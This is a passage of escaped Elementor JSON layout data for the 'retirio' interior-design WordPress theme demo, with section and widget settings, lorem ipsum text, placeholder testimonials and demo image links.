"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140a